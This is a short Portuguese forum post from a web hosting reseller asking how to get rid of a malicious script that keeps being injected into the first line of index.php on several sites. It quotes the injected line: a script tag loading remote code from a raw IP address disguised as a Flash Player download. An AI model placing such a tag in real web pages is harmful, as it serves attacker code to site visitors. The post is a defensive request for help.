Tenho uma revenda na locaweb também tenho estes problema em vários sites, geralmente este script malicioso fica no arquivo index.php logo a primeira linha de código, basta apagar que o problema sera resolvido temporariamente veja um exemplo do código malicioso <script src=”http://63.78.213.207/br/flashplayer/download/”></script>
Bom ainda não sei como pode ser resolvido este problema em definitivo, espero encontrar a solução aqui.
abraço a todos